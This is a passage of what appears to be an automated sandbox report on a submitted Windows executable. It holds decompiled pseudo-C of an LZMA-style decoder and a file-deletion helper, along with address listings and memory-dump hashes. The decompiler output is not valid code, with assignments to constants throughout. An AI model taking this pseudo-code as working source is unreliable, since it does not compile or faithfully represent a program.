                            												if(__ebx >= 0x100) {
                            													break;
                            												}
                            												__eax =  *(__ebp - 0x58);
                            												__edx = __ebx + __ebx;
                            												__ecx =  *(__ebp - 0x10);
                            												__esi = __edx + __eax;
                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                            												__ax =  *__esi;
                            												 *(__ebp - 0x54) = __esi;
                            												__edi = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													_t170 = __edx + 1; // 0x1
                            													__ebx = _t170;
                            													__cx = __ax >> 5;
                            													__eflags = __eax;
                            													 *__esi = __ax;
                            												} else {
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edi;
                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            													__ebx = __ebx + __ebx;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													continue;
                            												} else {
                            													goto L46;
                            												}
                            											}
                            											L54:
                            											_t173 = __ebp - 0x34;
                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                            											__eflags =  *_t173;
                            											goto L55;
                            										case 0xf:
                            											L58:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xf;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t203 = __ebp - 0x70;
                            											 *_t203 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t203;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											L60:
                            											__eflags = __ebx - 0x100;
                            											if(__ebx >= 0x100) {
                            												L55:
                            												__al =  *(__ebp - 0x44);
                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                            												goto L56;
                            											}
                            											L61:
                            											__eax =  *(__ebp - 0x58);
                            											__edx = __ebx + __ebx;
                            											__ecx =  *(__ebp - 0x10);
                            											__esi = __edx + __eax;
                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                            											__ax =  *__esi;
                            											 *(__ebp - 0x54) = __esi;
                            											__edi = __ax & 0x0000ffff;
                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            											__eflags =  *(__ebp - 0xc) - __ecx;
                            											if( *(__ebp - 0xc) >= __ecx) {
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            												__cx = __ax;
                            												_t217 = __edx + 1; // 0x1
                            												__ebx = _t217;
                            												__cx = __ax >> 5;
                            												__eflags = __eax;
                            												 *__esi = __ax;
                            											} else {
                            												 *(__ebp - 0x10) = __ecx;
                            												0x800 = 0x800 - __edi;
                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            												__ebx = __ebx + __ebx;
                            												 *__esi = __cx;
                            											}
                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                            											 *(__ebp - 0x44) = __ebx;
                            											if( *(__ebp - 0x10) >= 0x1000000) {
                            												goto L60;
                            											} else {
                            												goto L58;
                            											}
                            										case 0x10:
                            											L109:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0x10;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t365 = __ebp - 0x70;
                            											 *_t365 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t365;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											goto L111;
                            										case 0x11:
                            											L69:
                            											__esi =  *(__ebp - 0x58);
                            											 *(__ebp - 0x84) = 0x12;
                            											while(1) {
                            												 *(_t613 - 0x54) = _t606;
                            												goto L133;
                            											}
                            										case 0x12:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__eax =  *(__ebp - 0x58);
                            												 *(__ebp - 0x84) = 0x13;
                            												__esi =  *(__ebp - 0x58) + 2;
                            												while(1) {
                            													 *(_t613 - 0x54) = _t606;
                            													goto L133;
                            												}
                            											}
                            											__eax =  *(__ebp - 0x4c);
                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                            											__ecx =  *(__ebp - 0x58);
                            											__eax =  *(__ebp - 0x4c) << 4;
                            											__eflags = __eax;
                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                            											goto L130;
                            										case 0x13:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												_t469 = __ebp - 0x58;
                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                            												__eflags =  *_t469;
                            												 *(__ebp - 0x30) = 0x10;
                            												 *(__ebp - 0x40) = 8;
                            												L144:
                            												 *(__ebp - 0x7c) = 0x14;
                            												goto L145;
                            											}
                            											__eax =  *(__ebp - 0x4c);
                            											__ecx =  *(__ebp - 0x58);
                            											__eax =  *(__ebp - 0x4c) << 4;
                            											 *(__ebp - 0x30) = 8;
                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                            											L130:
                            											 *(__ebp - 0x58) = __eax;
                            											 *(__ebp - 0x40) = 3;
                            											goto L144;
                            										case 0x14:
                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                            											__eax =  *(__ebp - 0x80);
                            											 *(_t613 - 0x88) = _t533;
                            											goto L1;
                            										case 0x15:
                            											__eax = 0;
                            											__eflags =  *(__ebp - 0x38) - 7;
                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            											__al = __al & 0x000000fd;
                            											__eax = (__eflags >= 0) - 1 + 0xb;
                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                            											goto L120;
                            										case 0x16:
                            											__eax =  *(__ebp - 0x30);
                            											__eflags = __eax - 4;
                            											if(__eax >= 4) {
                            												_push(3);
                            												_pop(__eax);
                            											}
                            											__ecx =  *(__ebp - 4);
                            											 *(__ebp - 0x40) = 6;
                            											__eax = __eax << 7;
                            											 *(__ebp - 0x7c) = 0x19;
                            											 *(__ebp - 0x58) = __eax;
                            											goto L145;
                            										case 0x17:
                            											L145:
                            											__eax =  *(__ebp - 0x40);
                            											 *(__ebp - 0x50) = 1;
                            											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                            											goto L149;
                            										case 0x18:
                            											L146:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0x18;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t484 = __ebp - 0x70;
                            											 *_t484 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t484;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											L148:
                            											_t487 = __ebp - 0x48;
                            											 *_t487 =  *(__ebp - 0x48) - 1;
                            											__eflags =  *_t487;
                            											L149:
                            											__eflags =  *(__ebp - 0x48);
                            											if( *(__ebp - 0x48) <= 0) {
                            												__ecx =  *(__ebp - 0x40);
                            												__ebx =  *(__ebp - 0x50);
                            												0 = 1;
                            												__eax = 1 << __cl;
                            												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                            												__eax =  *(__ebp - 0x7c);
                            												 *(__ebp - 0x44) = __ebx;
                            												while(1) {
                            													 *(_t613 - 0x88) = _t533;
                            													goto L1;
                            												}
                            											}
                            											__eax =  *(__ebp - 0x50);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            											__eax =  *(__ebp - 0x58);
                            											__esi = __edx + __eax;
                            											 *(__ebp - 0x54) = __esi;
                            											__ax =  *__esi;
                            											__edi = __ax & 0x0000ffff;
                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            											__eflags =  *(__ebp - 0xc) - __ecx;
                            											if( *(__ebp - 0xc) >= __ecx) {
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            												__cx = __ax;
                            												__cx = __ax >> 5;
                            												__eax = __eax - __ecx;
                            												__edx = __edx + 1;
                            												__eflags = __edx;
                            												 *__esi = __ax;
                            												 *(__ebp - 0x50) = __edx;
                            											} else {
                            												 *(__ebp - 0x10) = __ecx;
                            												0x800 = 0x800 - __edi;
                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            												 *__esi = __cx;
                            											}
                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                            											if( *(__ebp - 0x10) >= 0x1000000) {
                            												goto L148;
                            											} else {
                            												goto L146;
                            											}
                            										case 0x19:
                            											__eflags = __ebx - 4;
                            											if(__ebx < 4) {
                            												 *(__ebp - 0x2c) = __ebx;
                            												L119:
                            												_t393 = __ebp - 0x2c;
                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                            												__eflags =  *_t393;
                            												L120:
                            												__eax =  *(__ebp - 0x2c);
                            												__eflags = __eax;
                            												if(__eax == 0) {
                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                            													goto L170;
                            												}
                            												__eflags = __eax -  *(__ebp - 0x60);
                            												if(__eax >  *(__ebp - 0x60)) {
                            													goto L171;
                            												}
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                            												__eax =  *(__ebp - 0x30);
                            												_t400 = __ebp - 0x60;
                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                            												__eflags =  *_t400;
                            												goto L123;
                            											}
                            											__ecx = __ebx;
                            											__eax = __ebx;
                            											__ecx = __ebx >> 1;
                            											__eax = __ebx & 0x00000001;
                            											__ecx = (__ebx >> 1) - 1;
                            											__al = __al | 0x00000002;
                            											__eax = (__ebx & 0x00000001) << __cl;
                            											__eflags = __ebx - 0xe;
                            											 *(__ebp - 0x2c) = __eax;
                            											if(__ebx >= 0xe) {
                            												__ebx = 0;
                            												 *(__ebp - 0x48) = __ecx;
                            												L102:
                            												__eflags =  *(__ebp - 0x48);
                            												if( *(__ebp - 0x48) <= 0) {
                            													__eax = __eax + __ebx;
                            													 *(__ebp - 0x40) = 4;
                            													 *(__ebp - 0x2c) = __eax;
                            													__eax =  *(__ebp - 4);
                            													__eax =  *(__ebp - 4) + 0x644;
                            													__eflags = __eax;
                            													L108:
                            													__ebx = 0;
                            													 *(__ebp - 0x58) = __eax;
                            													 *(__ebp - 0x50) = 1;
                            													 *(__ebp - 0x44) = 0;
                            													 *(__ebp - 0x48) = 0;
                            													L112:
                            													__eax =  *(__ebp - 0x40);
                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                            														_t391 = __ebp - 0x2c;
                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                            														__eflags =  *_t391;
                            														goto L119;
                            													}
                            													__eax =  *(__ebp - 0x50);
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            													__eax =  *(__ebp - 0x58);
                            													__esi = __edi + __eax;
                            													 *(__ebp - 0x54) = __esi;
                            													__ax =  *__esi;
                            													__ecx = __ax & 0x0000ffff;
                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                            													__eflags =  *(__ebp - 0xc) - __edx;
                            													if( *(__ebp - 0xc) >= __edx) {
                            														__ecx = 0;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                            														__ecx = 1;
                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                            														__ebx = 1;
                            														__ecx =  *(__ebp - 0x48);
                            														__ebx = 1 << __cl;
                            														__ecx = 1 << __cl;
                            														__ebx =  *(__ebp - 0x44);
                            														__ebx =  *(__ebp - 0x44) | __ecx;
                            														__cx = __ax;
                            														__cx = __ax >> 5;
                            														__eax = __eax - __ecx;
                            														__edi = __edi + 1;
                            														__eflags = __edi;
                            														 *(__ebp - 0x44) = __ebx;
                            														 *__esi = __ax;
                            														 *(__ebp - 0x50) = __edi;
                            													} else {
                            														 *(__ebp - 0x10) = __edx;
                            														0x800 = 0x800 - __ecx;
                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            														 *__esi = __dx;
                            													}
                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                            													if( *(__ebp - 0x10) >= 0x1000000) {
                            														L111:
                            														_t368 = __ebp - 0x48;
                            														 *_t368 =  *(__ebp - 0x48) + 1;
                            														__eflags =  *_t368;
                            														goto L112;
                            													} else {
                            														goto L109;
                            													}
                            												}
                            												__ecx =  *(__ebp - 0xc);
                            												__ebx = __ebx + __ebx;
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                            													__ecx =  *(__ebp - 0x10);
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            													__ebx = __ebx | 0x00000001;
                            													__eflags = __ebx;
                            													 *(__ebp - 0x44) = __ebx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													L101:
                            													_t338 = __ebp - 0x48;
                            													 *_t338 =  *(__ebp - 0x48) - 1;
                            													__eflags =  *_t338;
                            													goto L102;
                            												} else {
                            													goto L99;
                            												}
                            											}
                            											__edx =  *(__ebp - 4);
                            											__eax = __eax - __ebx;
                            											 *(__ebp - 0x40) = __ecx;
                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                            											goto L108;
                            										case 0x1a:
                            											L56:
                            											__eflags =  *(__ebp - 0x64);
                            											if( *(__ebp - 0x64) == 0) {
                            												 *(__ebp - 0x88) = 0x1a;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x68);
                            											__al =  *(__ebp - 0x5c);
                            											__edx =  *(__ebp - 8);
                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            											 *( *(__ebp - 0x68)) = __al;
                            											__ecx =  *(__ebp - 0x14);
                            											 *(__ecx +  *(__ebp - 8)) = __al;
                            											__eax = __ecx + 1;
                            											__edx = 0;
                            											_t192 = __eax %  *(__ebp - 0x74);
                            											__eax = __eax /  *(__ebp - 0x74);
                            											__edx = _t192;
                            											goto L79;
                            										case 0x1b:
                            											L75:
                            											__eflags =  *(__ebp - 0x64);
                            											if( *(__ebp - 0x64) == 0) {
                            												 *(__ebp - 0x88) = 0x1b;
                            												goto L170;
                            											}
                            											__eax =  *(__ebp - 0x14);
                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            											__eflags = __eax -  *(__ebp - 0x74);
                            											if(__eax >=  *(__ebp - 0x74)) {
                            												__eax = __eax +  *(__ebp - 0x74);
                            												__eflags = __eax;
                            											}
                            											__edx =  *(__ebp - 8);
                            											__cl =  *(__eax + __edx);
                            											__eax =  *(__ebp - 0x14);
                            											 *(__ebp - 0x5c) = __cl;
                            											 *(__eax + __edx) = __cl;
                            											__eax = __eax + 1;
                            											__edx = 0;
                            											_t274 = __eax %  *(__ebp - 0x74);
                            											__eax = __eax /  *(__ebp - 0x74);
                            											__edx = _t274;
                            											__eax =  *(__ebp - 0x68);
                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            											_t283 = __ebp - 0x64;
                            											 *_t283 =  *(__ebp - 0x64) - 1;
                            											__eflags =  *_t283;
                            											 *( *(__ebp - 0x68)) = __cl;
                            											L79:
                            											 *(__ebp - 0x14) = __edx;
                            											goto L80;
                            										case 0x1c:
                            											while(1) {
                            												L123:
                            												__eflags =  *(__ebp - 0x64);
                            												if( *(__ebp - 0x64) == 0) {
                            													break;
                            												}
                            												__eax =  *(__ebp - 0x14);
                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            												__eflags = __eax -  *(__ebp - 0x74);
                            												if(__eax >=  *(__ebp - 0x74)) {
                            													__eax = __eax +  *(__ebp - 0x74);
                            													__eflags = __eax;
                            												}
                            												__edx =  *(__ebp - 8);
                            												__cl =  *(__eax + __edx);
                            												__eax =  *(__ebp - 0x14);
                            												 *(__ebp - 0x5c) = __cl;
                            												 *(__eax + __edx) = __cl;
                            												__eax = __eax + 1;
                            												__edx = 0;
                            												_t414 = __eax %  *(__ebp - 0x74);
                            												__eax = __eax /  *(__ebp - 0x74);
                            												__edx = _t414;
                            												__eax =  *(__ebp - 0x68);
                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            												__eflags =  *(__ebp - 0x30);
                            												 *( *(__ebp - 0x68)) = __cl;
                            												 *(__ebp - 0x14) = _t414;
                            												if( *(__ebp - 0x30) > 0) {
                            													continue;
                            												} else {
                            													L80:
                            													 *(__ebp - 0x88) = 2;
                            													goto L1;
                            												}
                            											}
                            											 *(__ebp - 0x88) = 0x1c;
                            											goto L170;
                            									}
                            								}
                            								L171:
                            								_t535 = _t534 | 0xffffffff;
                            								goto L172;
                            							}
                            						}
                            					}
                            				}
                            			}













                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00407056
                            0x00407056
                            0x00407059
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x00000000
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x004073cb
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00000000
                            0x00407489
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00407447
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00000000
                            0x0040744d
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004073ce
                            0x004073cb

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 41%
                            			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                            				int _t9;
                            				long _t13;
                            				WCHAR* _t14;
                            
                            				_t14 = _a4;
                            				_t13 = E00406133(_t14);
                            				if(_t13 == 0xffffffff) {
                            					L8:
                            					return 0;
                            				}
                            				_push(_t14);
                            				if((_a8 & 0x00000001) == 0) {
                            					_t9 = DeleteFileW();
                            				} else {
                            					_t9 = RemoveDirectoryW(); // executed
                            				}
                            				if(_t9 == 0) {
                            					if((_a8 & 0x00000004) == 0) {
                            						SetFileAttributesW(_t14, _t13);
                            					}
                            					goto L8;
                            				} else {
                            					return 1;
                            				}
                            			}







                            APIs
